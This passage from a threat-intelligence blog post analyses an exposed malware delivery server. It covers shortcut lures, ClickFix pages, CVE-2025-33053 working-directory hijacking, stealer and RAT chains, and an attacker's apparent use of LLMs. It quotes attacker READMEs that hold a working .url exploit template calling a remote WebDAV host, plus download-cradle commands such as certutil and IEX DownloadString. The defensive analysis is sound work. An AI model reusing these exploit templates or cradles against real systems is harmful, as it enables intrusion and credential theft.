showed the WebClient service starting, followed by </span><span><span data-type="inlineCode">davclnt.dll</span></span><span> reaching out to a remote host to retrieve content.</span></p><p><span>That initial hit led us to dig deeper into the delivery setup, which is how we ended up finding an exposed directory. It quickly became clear to us that the server wasn't just hosting files, but also was used as an active malware testing and delivery hub. Alongside payloads, we found bulk-generated shortcut lures, URL-based execution tests, ClickFix pages, WebDAV initialization scripts, droppers, spoofed filenames, and operator notes.</span></p><p><span>At a high level, the 1,048 files clustered as follows:</span></p><p><span></span></p><table><colgroup data-width="1566"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Category</strong></span></p></td><td><p><span><strong>Files</strong></span></p></td><td><p><span><strong>Functions and discoveries</strong></span></p></td></tr><tr><td><p><span>LNK delivery launchers</span></p></td><td><p><span>453</span></p></td><td><p><span>Bulk-generated shortcut lures using document themes, spoofed filenames, fake icons, and multiple execution paths</span></p></td></tr><tr><td><p><span>Filename-spoofing QA</span></p></td><td><p><span>236</span></p></td><td><p><span>Tests for Unicode, double-extension, padding, and browser/Explorer rendering behavior</span></p></td></tr><tr><td><p><span>URL/LOLBin execution tests</span></p></td><td><p><span>146</span></p></td><td><p><span>Experiments with signed Windows binaries, remote working directories, and WebDAV-style execution</span></p></td></tr><tr><td><p><span>Encrypted droppers</span></p></td><td><p><span>89</span></p></td><td><p><span>Staged second-stage payloads and installer-style packages</span></p></td></tr><tr><td><p><span>Alternative execution containers</span></p></td><td><p><span>24</span></p></td><td><p><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, </span><span><span data-type="inlineCode">.cpl</span></span><span>, and related delivery containers</span></p></td></tr><tr><td><p><span>Payload stubs and spoofed executables</span></p></td><td><p><span>21</span></p></td><td><p><span>Smaller loaders, decoys, and renamed binaries</span></p></td></tr><tr><td><p><span>WebDAV scripts</span></p></td><td><p><span>17</span></p></td><td><p><span>Scripts intended to make WebDAV delivery more reliable on Windows systems</span></p></td></tr><tr><td><p><span>Builder and operator notes</span></p></td><td><p><span>10</span></p></td><td><p><span><span data-type="inlineCode">README</span></span><span> files, test reports, mappings, and generation scripts</span></p></td></tr><tr><td><p><span>ClickFix HTML lures</span></p></td><td><p><span>9</span></p></td><td><p><span>Browser-based social-engineering pages instructing users to run commands</span></p></td></tr><tr><td><p><span>Miscellaneous files</span></p></td><td><p><span>6</span></p></td><td><p><span>Included documentation for the actor’s WebDAV delivery/admin panel</span></p></td></tr></tbody></table><p><span><em>Table 1: Breakdown of files recovered from the attacker’s delivery workspace</em></span></p><h2><span>Technical analysis and observed attacker behavior</span></h2><h3>Attackers testing like a product team</h3><p><span>The open directory exposed the attacker’s payloads and testing process. The collection varied by function: some folders stored payloads, while others isolated individual delivery methods, including WebDAV, UNC paths, </span><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, Control Panel items, and trusted Windows binaries. Several directories appeared to be QA areas for testing how lures are rendered in browsers and Windows Explorer. These tests included Unicode spoofing, right-to-left override (RTLO) characters, double extensions, and padding tricks used to make executables look like documents.</span></p><p><span>The directory also contained several README files. Their structure and phrasing suggested they may have been generated with LLMs. Some folders were named </span><span><span data-type="inlineCode">testik</span></span><span> and </span><span><span data-type="inlineCode">testik2</span></span><span>, a Russian diminutive form of “test”.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" alt="testing-files-subfolders.png" caption="Figure 1: Snippet of one of many subfolders containing testing files." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="testing-files-subfolders.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" data-sys-asset-uid="bltbc6d4a9f8e6c1e40" data-sys-asset-filename="testing-files-subfolders.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Snippet of one of many subfolders containing testing files." data-sys-asset-alt="testing-files-subfolders.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Snippet of one of many subfolders containing testing files.</figcaption></div></figure><p>⠀</p><p><span>Looking at the artifacts from the open directory, we saw that the attacker was testing some specific CVEs.</span></p><p><span></span></p><table><colgroup data-width="1901"><col><col><col></colgroup><tbody><tr><td><p><span><strong>CVE</strong></span></p></td><td><p><span><strong>Observed samples</strong></span></p></td><td><p><span><strong>Short description</strong></span></p></td></tr><tr><td><p><span>CVE-2025-33053</span></p></td><td><p><span>11</span></p></td><td><p><span>Windows Internet Shortcut flaw involving external control of a file name or path, allowing code execution over a network. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-33053?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2026-21513</span></p></td><td><p><span>4</span></p></td><td><p><span>MSHTML Framework security feature bypass caused by protection-mechanism failure. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21513?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2025-24054</span></p></td><td><p><span>1</span></p></td><td><p><span>Windows NTLM spoofing issue where crafted file/path handling can trigger outbound authentication and leak NTLM material; observed tradecraft commonly involved </span><span><span data-type="inlineCode">.library-ms</span></span><span> files. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24054?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr></tbody></table><p><span><em>Table 2: CVE references observed in the exposed directory.</em></span></p><p></p><p><span>The most developed test set focused on </span><span>CVE-2025-33053,</span><span> the working-directory abuse technique reported by Check Point in its analysis of Stealth Falcon activity. It appears as though the threat was trying to reproduce or adapt the reported technique with the help from README that appears to have been generated with LLMs. At a high level, the technique abuses </span><span><span data-type="inlineCode">.url</span></span><span> shortcut behavior to launch a legitimate signed Windows binary while setting its working directory to an attacker-controlled WebDAV share. In the original reporting, the binary was </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span>, an Internet Explorer diagnostics utility. When invoked, that utility launches several child processes by name. If the working directory points to a remote WebDAV location controlled by the attacker, Windows may resolve those child process names from the remote share instead of the expected local system directory.</span></p><p><span>The README files closely mirrored this logic. They called out </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> as the preferred binary, referenced the same WebDAV working-directory pattern described in the Stealth Falcon reporting, and preserved the previously reported </span><span><span data-type="inlineCode">summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr</span></span><span> path as an example. So if you ever wonder who reads your blogs, it seems like attackers do.</span></p><p></p><pre language="c">CVE-2025-33053 (Stealth Falcon APT) - Test Setup
=====================================================

WHAT IS THIS?
This .url file abuses iediagcmd.exe to execute a file from WebDAV
WITHOUT any security warnings. Zero alerts!

HOW IT WORKS:
1. .url file contains URL=path to iediagcmd.exe (legitimate IE tool)
2. .url sets WorkingDirectory to WebDAV share
3. When clicked: iediagcmd.exe starts with cwd = WebDAV
4. iediagcmd internally calls: route.exe, ipconfig.exe, netsh.exe, ping.exe
5. Process.Start() searches in working directory FIRST
6. WebClient auto-starts when accessing WebDAV
7. Attacker's route.exe (renamed putty.exe) runs from WebDAV
8. NO SmartScreen, NO MoTW warnings!

REQUIREMENTS TO MAKE TEST WORK:
================================

1. iediagcmd.exe MUST exist on victim machine
   Path: C:\Program Files\Internet Explorer\iediagcmd.exe
   - Win10 (1607-22H2):        YES
   - Win11 21H2/22H2/23H2:     usually YES
   - Win11 24H2 (IE removed):  NO (this is why your F-series failed!)
   - Check on victim:
     dir "C:\Program Files\Internet Explorer\iediagcmd.exe"

2. WebDAV MUST have file named EXACTLY "route.exe"
   NOT putty.exe! iediagcmd will only execute these names:
   - route.exe
   - ipconfig.exe
   - netsh.exe
   - ping.exe
   On your WebDAV server, RENAME putty.exe to route.exe
   Place at: \\TA_C2\Downloads\route.exe

3. Microsoft patch from June 2025 MUST NOT be installed
   Check: Get-HotFix | Where-Object {$_.HotFixID -match "KB5060"}
   If patched, exploit fails.

ALTERNATIVE LOLBINS (if iediagcmd.exe missing):
================================================
F4_CustomShellHost_explorer.url - uses CustomShellHost.exe
   (mentioned in CheckPoint report - spawns explorer.exe)
F5_OfficeC2RClient_alternative.url - uses Office C2R client
   (if Office is installed)

REAL ATTACK PAYLOAD WAS:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D</pre><p language="html"><span><em>Figure 2: Contents of README, likely generated by LLM, found in the exposed directory.</em></span><em><br></em>⠀</p><p><span>The testing approach was methodical and included the below:</span></p><p><span><strong>Transports</strong></span><span>: WebDAV over </span><span><span data-type="inlineCode">@80</span></span><span> and </span><span><span data-type="inlineCode">@ssl@443</span></span></p><p><span><strong>Path formats</strong></span><span>: </span><span><span data-type="inlineCode">DavWWWRoot</span></span><span> vs. plain UNC</span></p><p><span><strong>Fallback LOLBins</strong></span><span>: </span><span><span data-type="inlineCode">CustomShellHost.exe</span></span><span>, </span><span><span data-type="inlineCode">OfficeC2RClient.exe</span></span><span>, and many more for hosts where </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> is absent</span></p><p><span><strong>Download cradles</strong></span><span>: </span><span><span data-type="inlineCode">bitsadmin /transfer</span></span><span>, </span><span><span data-type="inlineCode">certutil -urlcache -split -f</span></span><span>, </span><span><span data-type="inlineCode">mshta http(s)://…</span></span></p><p><span><strong>Shortcut launchers</strong></span><span>: PowerShell </span><span><span data-type="inlineCode">IEX (New-Object Net.WebClient).DownloadString(...)</span></span><span>, hidden/minimized windows</span></p><p><span><strong>Explorer containers</strong></span><span>: </span><span><span data-type="inlineCode">search-ms:</span></span><span> queries and </span><span><span data-type="inlineCode">.library-ms</span></span><span> files exposing remote payloads</span></p><p><span><strong>ClickFix pages</strong></span><span>: relying on user copy/paste execution</span></p><p><span><strong>Filename spoofing</strong></span><span>: RTLO (U+202E), double extensions, and whitespace padding before </span><span><span data-type="inlineCode">.exe</span></span><span> / </span><span><span data-type="inlineCode">.scr</span></span></p><h2>The lure factory</h2><p><span>The lure themes were broad and familiar: invoices, privacy policies, contracts, signed documents, finance reports, Labcorp-themed reports, salary statements, and notification policies.</span></p><p><span>Judging by the lure themes, we concluded that the attacker is targeting enterprise Windows users who are likely to open routine documents.</span></p><p><span>The threat actor also invested heavily in making files look “safe”. Many lure names mimicked PDFs or office documents. Others used fake icons associated with common software. Some attempted to hide arguments or launch windows minimized. Clearly, the goal was to make malicious execution feel like ordinary document handling.</span></p><p><span>The directory also contained ClickFix HTML lures. These pages mimicked familiar services, application errors, and document-access workflows to convince users to copy and run a command. The lures were disguised as Cloudflare verification checks, Adobe or Word document errors, Microsoft login pages, Chrome update messages, and Discord-themed notices. Filenames such as </span><span><span data-type="inlineCode">Fix_Connection_Error.html</span></span><span>, </span><span><span data-type="inlineCode">Update_Required.html</span></span><span>, </span><span><span data-type="inlineCode">Secure_Document_Access.html</span></span><span>, </span><span><span data-type="inlineCode">Verification_Failed.html</span></span><span>, and </span><span><span data-type="inlineCode">Open_Document_Instructions.html</span></span><span> show how the actor repackaged the same execution pattern under different social-engineering themes.</span></p><p><span>The commands typically launched PowerShell to fetch remote content, used </span><span><span data-type="inlineCode">cmd.exe</span></span><span> to open payloads from WebDAV or UNC paths, or used utilities like </span><span><span data-type="inlineCode">rundll32</span></span><span> and </span><span><span data-type="inlineCode">mshta</span></span><span> to proxy execution. Many referenced attacker-controlled paths, temporary directories, hidden windows, or encoded arguments to reduce visibility.</span></p><h2>The payload chains </h2><p><span>The exposed directory contained many payloads, but we did not reverse every binary in the collection. We initially started with reverse engineering, but after analyzing several chains, we found repeated packaging patterns and suspected that some staged files may have led to the same or closely related final payloads.</span></p><p><span>We therefore shifted from exhaustive reverse engineering to triage. We reviewed several files, including </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, </span><span><span data-type="inlineCode">CursorSetup</span></span><span>, </span><span><span data-type="inlineCode">ReportFinal.rsc.pdf</span></span><span>, </span><span><span data-type="inlineCode">ReportFina.exe</span></span><span> and </span><span><span data-type="inlineCode">pdfgear_setup_v2.1.16.exe</span></span><span>, and prioritized payloads that either represented distinct delivery approaches or were tied to observed campaign activity.</span></p><p><span>Our main focus became the most commonly delivered file in the most recent CURP campaign, based on artifacts we found in cPanel. This gave us the clearest link between the exposed delivery infrastructure and active campaign activity. </span></p><p><span>This scope is intentional. This post is about the attacker’s delivery workflow, not a full reverse-engineering report for every sample in the directory. We use the payload analysis to show how the operator packaged lures, staged loaders, tested execution methods, and moved from delivery to final payload execution. </span></p><h2><span>Case study 1: CURP campaign targeting Mexico</span></h2><p><span>Our MDR alert began with a user who landed on the phishing site </span><span><span data-type="inlineCode">www[.]gobf[.]mx</span></span><span>, a typosquat impersonating the Mexican government's CURP (Clave Única de Registro de Población) national-ID lookup service at </span><a href="https://www.gob.mx/curp/" target="_blank"><span>https://www.gob.mx/curp/</span></a><span>. The phishing site presented a convincing single-page application that asked victims to enter CURP identity data and retrieve an official record.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico%E2%80%99s-CURP-lookup-service.png" alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-uid="bltc4d4e8c3f881bba8" data-sys-asset-filename="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." data-sys-asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic.</figcaption></div></figure><p>⠀</p><p><span>The site’s client-side JavaScript handled the fake ID lookup flow and then triggered payload delivery when the victim clicked the download button. Instead of downloading a PDF directly, the script invoked a </span><span><span data-type="inlineCode">search-ms:</span></span><span> URI that opened the operator’s remote WebDAV share as a Windows Explorer search view filtered to </span><span><span data-type="inlineCode">.scr</span></span><span> files:</span></p><p><span></span></p><pre language="c">search-ms:displayname=Search Results in \\onedrive.cv@80\Downloads\CURP
         &amp;query=*.scr
         &amp;crumb=location:\\onedrive.cv@80\Downloads\CURP</pre><p>⠀<br><span>It's worth mentioning that the malicious Javascript with russian comments appears to be also generated with the help of GenAI. As you can see in the screenshot above it contains emojis and comments which are very typical for the LLM models.</span></p><p><span>The exposed Simba Service panel tied this phishing flow back to the attacker’s delivery infrastructure. The </span><span><span data-type="inlineCode">CURP</span></span><span> folder was the most-accessed campaign folder, with 2,384 recorded interactions. The same count appeared for </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span>, making it the clearest link between the phishing site, the WebDAV delivery path, and active campaign activity.</span><br></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" alt="Simba-Service-WebDAV-dashboard-CURP.png" caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-uid="bltedc57850fe037c68" data-sys-asset-filename="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." data-sys-asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions.</figcaption></div></figure><p>⠀</p><p><span>Although </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span> appeared to be a PDF, it was actually a right-to-left override (RTLO) masqueraded </span><span><span data-type="inlineCode">.scr</span></span><span> executable built with a Delphi/Inno Setup installer. Once executed, it extracted and launched the </span><span><span data-type="inlineCode">Fo-Binary.exe</span></span><span> loader, initiating the multi-stage infection chain.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" alt="Execution-chain-PDF-lure.jpg" caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" data-sys-asset-uid="bltf312b78111eb9912" data-sys-asset-filename="Execution-chain-PDF-lure.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." data-sys-asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration.</figcaption></div></figure><p>⠀</p><p><span>The final payload was an unknown .NET information stealer, operated entirely fileless-ly to evade disk-based detection. The execution sequence followed as such:</span></p><ul><li><span><strong>Decryption:</strong></span><span> The </span><span><span data-type="inlineCode">Fcqleh</span></span><span> loader decrypted the embedded payload using AES and GZip.</span></li><li><p><span><strong>Reflective Loading: </strong></span><span>The loader mapped the payload directly into memory using the </span><span><span data-type="inlineCode">Assembly.Load(byte[])</span></span><span> API.</span></p></li><li><p><span><strong>Process Injection:</strong></span><span> The malicious code was executed inside a legitimate, EV-signed Qihoo 360 process via process hollowing, allowing the malicious code to run under a trusted signed process image.</span></p></li></ul><p><span>The decrypted in-memory configuration exposed the payload’s feature set and version </span><span><span data-type="inlineCode">4.4.3</span></span><span>. It also contained the build tag </span><span><span data-type="inlineCode">06x12x2026SantaEbash2</span></span><span>, which matched toolkit timestamps from June 12, 2026.</span></p><p><span>Once running, the stealer targeted cryptocurrency assets, browser data, messaging sessions, and local application data. Its collection logic included around 20 desktop wallet clients and browser wallet extensions, saved browser usernames, passwords, cookies, session tokens, the Telegram </span><span><span data-type="inlineCode">tdata</span></span><span> session database, Foxmail data, and a screenshot of the victim’s desktop.</span></p><p><span>The payload also included anti-analysis checks. The payload checked for the </span><span><span data-type="inlineCode">COR_PROFILER</span></span><span> environment variable and called </span><span><span data-type="inlineCode">IsDebuggerPresent</span></span><span>. If the malware detected that it was being monitored or debugged, it immediately called </span><span><span data-type="inlineCode">FailFast</span></span><span> to kill the process. The stealer also delayed decrypting its watchlist and collection configuration until after a successful C2 handshake, preventing its full functionality from being revealed in isolated sandboxes. </span></p><p><span>Collected data was exfiltrated to </span><span><span data-type="inlineCode">77[.]110.127.205</span></span><span> (alias </span><span><span data-type="inlineCode">google.services.ug</span></span><span>, certificate </span><span><span data-type="inlineCode">CN=Eglgyqnoa</span></span><span>) over </span><span><span data-type="inlineCode">SslStream</span></span><span> (TLS without SNI) and raw </span><span><span data-type="inlineCode">Socket</span></span><span>.</span><span>The stolen data was sent as a multipart HTTP POST request to </span><span><span data-type="inlineCode">/c2</span></span><span>.</span></p><p><span>Based on the analyzed behavior, the payload functioned as an information stealer focused on credential, wallet, and session theft.</span></p><h2>Case study 2: The "DlrtyGames" sideloading chain</h2><p><span>While the </span><span><span data-type="inlineCode">ReportFinal</span></span><span> lure used an Inno Setup installer to launch a fileless stealer, a second campaign directory on the server, </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, showed a different delivery architecture. This chain was built to deploy a modular RAT through DLL sideloading, IDAT, process hollowing, and persistence.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> chain began with a silent 7-Zip SFX dropper, </span><span><span data-type="inlineCode">DlrtyGames.exe</span></span><span>. It extracted a benign, signed Ubisoft binary, </span><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span>, into the victim’s temporary directory alongside a trojanized dependency, </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. </span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" alt="DlrtyGames-execution-chain.jpg" caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" data-sys-asset-uid="bltf89ec69e4241e5c3" data-sys-asset-filename="DlrtyGames-execution-chain.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." data-sys-asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution.</figcaption></div></figure><p>⠀</p><p><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span> used DLL sideloading to load </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. This decoded its configuration, resolved APIs by hash, and manually mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span>. The mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span> stage then read </span><span><span data-type="inlineCode">loader-pool.db</span></span><span>, a PNG file whose encrypted modules were stored across IDAT chunks. After a 45-second sleep delay, it reassembled and decrypted the embedded content, set up persistence, performed COM auto-elevation through </span><span><span data-type="inlineCode">dllhost.exe</span></span><span>, and prepared the final hollowing stage.</span></p><p><span>The final injection stage was handled by an x86 PIC shellcode blob carved from </span><span><span data-type="inlineCode">loader-pool.db</span></span><span> at offset </span><span><span data-type="inlineCode">0xb516a</span></span><span>. That shellcode created signed host processes such as </span><span><span data-type="inlineCode">MegArray.exe</span></span><span> or </span><span><span data-type="inlineCode">Crisp.exe</span></span><span> in a suspended state, unmapped their original image, wrote the payload into the process, updated thread context, and resumed execution. The result was a modular .NET RAT running inside a signed host process.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> payload was a modular RAT with plugins for keylogging, screenshots, window monitoring, and C2 communication. Its keylogger module used plaintext keyword triggers for payment, banking, credit, and cryptocurrency activity, including </span><span><span data-type="inlineCode"><em>relaypayments.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>plaid</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fiservapps</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>payoneer</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>google pay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>coinbase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Zelle</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>paypal</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>link.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>amazonrelay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Exodus</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Electrum</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Bitcoin</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>monero</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed Phrase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>12</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>FCU</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Credit Union</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Account Overview</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Available Balance</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Merchant</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>online access</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>debit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>credit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>cvv</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>card</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>settlement</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fees</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>loans</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>bank</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>banking</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>finance</em></span></span><span><em>, and </em></span><span><span data-type="inlineCode"><em>invest</em></span></span><span><em>. </em></span></p><p><span>The RAT also targeted browser wallet-extension artifacts and Chrome user data, including cookies and saved login data.</span></p><p><span>The two chains used different payloads and C2 infrastructure. In case study one, the stealer exfiltrated to </span><span><span data-type="inlineCode">77[.]110[.]127[.]205:56003</span></span><span>, while in the case study two stealer chain communicated with </span><span><span data-type="inlineCode">23[.]94[.]252[.]228:57666</span></span><span>. Based on our observations, the final RAT payload in both chains was identified as .NET-based PureRAT.</span></p><h3>GenAI adoption</h3><p><span>Several artifacts make it clear the attacker certainly used LLMs to build and iterate this operation. The directory is packed with structured README files, neatly formatted lure-generation guides, detailed test writeups, and matrix-style outputs that look exactly like templated or generated content. </span></p><p><span></span></p><pre language="c">═══════════════════════════════════════════════════════════════════
  WORKING DIRECTORY HIJACKING — COMPREHENSIVE TEST KIT
  for Windows 11 24H2
═══════════════════════════════════════════════════════════════════

This kit contains 59 .url files targeting different Windows binaries
that POTENTIALLY have the same Working Directory hijacking issue as
CVE-2025-33053 (Stealth Falcon, iediagcmd.exe).

ALL .url files use this exact format (same as the real APT attack):
  [InternetShortcut]
  URL=C:\path\to\target.exe         &lt;- legitimate binary
  WorkingDirectory=\\[REDACTED]@80\Downloads   &lt;- WebDAV (triggers WebClient!)
  ShowCommand=7                     &lt;- start minimized (hide alert windows)
  IconIndex=13                      &lt;- (decoy icon)
  IconFile=msedge.exe               &lt;- (decoy icon)

═══════════════════════════════════════════════════════════════════
HOW TO TEST (5 minutes)
═══════════════════════════════════════════════════════════════════

STEP 1: Upload ALL files from WEBDAV_PAYLOADS/ folder to:
        \\[REDACTED]\Downloads\
        (59 test files - each is 5KB MessageBox popup exe)

STEP 2: Copy I_LOLBIN_URLS/ folder to your Win11 24H2 machine

STEP 3: Double-click .url files one by one (or all of them in sequence)
        - If popup appears -&gt; HIJACK WORKS! Read parent process name in popup.
        - If nothing happens / error -&gt; doesn't work, move to next.

STEP 4: Tell me which I-numbers showed a popup. I'll integrate working
        ones as new methods in web-renamer.

═══════════════════════════════════════════════════════════════════
PRIORITY TESTING ORDER (most likely to work first)
═══════════════════════════════════════════════════════════════════

TIER 1 - CONFIRMED IN THE WILD:
  I01_iediagcmd.url           - CVE-2025-33053 (needs pre-June 2025 patch)
  I02_CustomShellHost.url     - CheckPoint research (may not exist on Server)

TIER 2 - .NET FRAMEWORK TOOLS (always installed if .NET 4.x present):
  I03_InstallUtil.url         - InstallUtilLib.dll search
  I04_RegAsm.url              - .NET registration
  I05_RegSvcs.url             - .NET services
  I06_CasPol.url              - .NET security policy
  I07_ngentask.url            - NGen native compile (calls ngen.exe!)
  I08_AddInUtil.url           - AddIn util (calls AddInProcess.exe!)
  I10_dfsvc.url               - ClickOnce service
  I15_csc.url                 - C# compiler (may call link.exe)
  I16_vbc.url                 - VB compiler

TIER 3 - WIN11 SYSTEM .NET TOOLS:
  I17_LbfoAdmin.url           - NIC teaming admin
  I19_UevAgentPolicyGenerator.url - UE-V agent (calls .ps1 files!)
  I20_UevAppMonitor.url       - UE-V monitor
  I23_AppVStreamingUX.url     - App-V streaming UI

TIER 4 - LOLBAS Execute-EXE binaries:
  I26_Pcwrun.url              - LOLBAS Execute(EXE)
